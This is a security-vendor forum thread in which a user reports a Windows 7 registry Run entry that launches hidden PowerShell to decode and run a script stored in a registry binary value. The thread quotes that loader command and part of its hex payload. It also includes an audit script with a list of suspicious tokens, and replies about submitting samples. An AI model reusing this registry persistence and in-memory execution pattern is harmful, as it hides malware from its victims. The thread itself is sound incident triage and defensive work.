strange power shell script

Scholar

strange power shell script

Dear Support,

Today I discovered a Windows 7 workstation that, during user access, was starting a strange PowerShell script.

Looking in the Run key of the registry I saw this string:

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"cmstsitf"="rundll32 shell32.dll,ShellExec_RunDLL \"cmd\" /c start /min powershell iex([System.Text.Encoding]::ASCII.GetString((Get-ItemProperty 'HKCU:\\Software\\AppDataLow\\Software\\Microsoft\\9D5F3F33-585C-D7B3-4A21-0CFB1EE5005F').chsbWNet))"


Looking in the registry key 9D5F3F33-585C-D7B3-4A21-0CFB1EE5005F I see this data.

(The byte data is much longer.)

[HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\9D5F3F33-585C-D7B3-4A21-0CFB1EE5005F]
"Client32"=hex:2c,2f,f8,cc,96,b4,20,01,00,2f,f8,cc,46,4b,2f,01,f0,c7,f7,cc,46,\
5c,2f,01,f0,e7,f7,cc,46,7c,2f,01,f0,e7,f7,cc,46,7c,2f,01,f0,e7,f7,cc,46,7c,\
2f,01,f0,e7,f7,cc,46,7c,2f,01,f0,e7,f7,cc,46,7c,d7,01,84,fa,13,f2,14,55,c8,\
ef,af,ae,1a,e3,5b,b0,14,32,e3,2f,e2,92,8e,2d,a6,83,0e,26,cf,fe,d6,d3,78,52,\[...]

Could it be some kind of malware?
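The Run entry quoted above is a two-stage loader: the Run value only starts PowerShell, and the actual script lives as a binary registry value that is decoded with `[System.Text.Encoding]::ASCII.GetString` and passed straight to `iex`. The following PowerShell is an added example for triaging this pattern; it is not code from the thread or from F-Secure. It enumerates the common Run/RunOnce keys, flags values that combine a PowerShell launch with a registry read or in-memory evaluation, and decodes a referenced blob to a text file (instead of executing it) so it can be inspected or submitted as a sample. It assumes PowerShell 4 or later (`Get-FileHash`), and the key, value name and output path in the usage line are taken from the post only as an illustration.

```powershell
# Added example: audit autorun entries for "PowerShell + payload stored elsewhere"
# and dump such a payload to disk as text for analysis, without running it.

$runKeys = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
)

# Tokens that, in combination, indicate a script assembled at run time rather
# than a normal program path. A single hit (e.g. just "powershell") is common
# and benign, so the filter requires at least two.
$suspiciousTokens = 'powershell', 'iex', 'Invoke-Expression', 'Get-ItemProperty',
                    'FromBase64String', 'GetString', 'rundll32', 'ShellExec_RunDLL'

function Get-SuspiciousRunEntry {
    foreach ($key in $runKeys) {
        if (-not (Test-Path $key)) { continue }
        $props = Get-ItemProperty -Path $key
        foreach ($p in $props.PSObject.Properties) {
            if ($p.Name -like 'PS*') { continue }   # skip PSPath, PSParentPath, PSProvider, ...
            $value = [string]$p.Value
            $hits = @($suspiciousTokens | Where-Object { $value -match [regex]::Escape($_) })
            if ($hits.Count -ge 2) {
                [pscustomobject]@{
                    Key   = $key
                    Name  = $p.Name
                    Value = $value
                    Hits  = ($hits -join ', ')
                }
            }
        }
    }
}

function Export-RegistryBlobAsText {
    param(
        [Parameter(Mandatory)][string]$Path,       # registry key holding the blob
        [Parameter(Mandatory)][string]$ValueName,  # REG_BINARY value named in the Run entry
        [Parameter(Mandatory)][string]$OutFile
    )
    $bytes = (Get-ItemProperty -Path $Path).$ValueName
    if ($null -eq $bytes) { throw "Value '$ValueName' not found under $Path" }
    # Decode exactly the way the loader does (ASCII -> string), but write the
    # result to a file instead of handing it to iex.
    $text = [System.Text.Encoding]::ASCII.GetString([byte[]]$bytes)
    Set-Content -Path $OutFile -Value $text -Encoding ASCII
    # Hash for the sample-submission form / incident notes.
    Get-FileHash -Path $OutFile -Algorithm SHA256
}

# Usage (values below are the ones quoted in the post, used here for illustration):
Get-SuspiciousRunEntry | Format-List
# Export-RegistryBlobAsText `
#     -Path 'HKCU:\Software\AppDataLow\Software\Microsoft\9D5F3F33-585C-D7B3-4A21-0CFB1EE5005F' `
#     -ValueName 'chsbWNet' -OutFile "$env:TEMP\suspect_payload.txt"
```

Note that the Run entry in the post reads the value `chsbWNet`, whereas the hex dump shown is for a value named `Client32`; when exporting, use the value name that the Run command actually references, and export any other binary values under the same key as well, since they may be additional stages. Run the audit under each user profile on the machine, because HKCU entries are per user and a scan from an administrator session will not see another user's hive.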

Moderator

Re: strange power shell script

Hi tecnicogsn


If you suspect that:
  • A clean file has been falsely detected as malicious, or
  • A file that is malicious has not been detected by our software,
you can submit the file to our labs for further investigation. To submit a sample file, go to Submit a Sample or browse to the following link: https://www.f-secure.com/en/web/labs_global/submit-a-sample#sample-file
  1. Select the File Sample tab.
  2. Click Choose File, and attach your sample file.
    • Tick the box I want to give more details about this sample and to be notified of the analysis results if you want to receive feedback from F-Secure Labs on the submitted file.
    • Note: Subject and description should be written in English.
  3. Verify that you are not a robot with reCAPTCHA.
  4. Click Submit sample file.
The sample submission is analyzed by our analysts and databases, and is updated if necessary.

For more information on how you can submit a sample, read our Community article here.
Superuser

Re: strange power shell script

Hello,


I think you should use the built-in "F-Secure Support Tool" diagnostics on the computer, either through local run or activated remotely via centralized management and submit the resulting FSDIAG compressed file to F-Secure tech support. That often allows them to find out what's going on, even if an outright binary sample of the suspected malware cannot be located.


Best Regards: Tamas Feher, Hungary.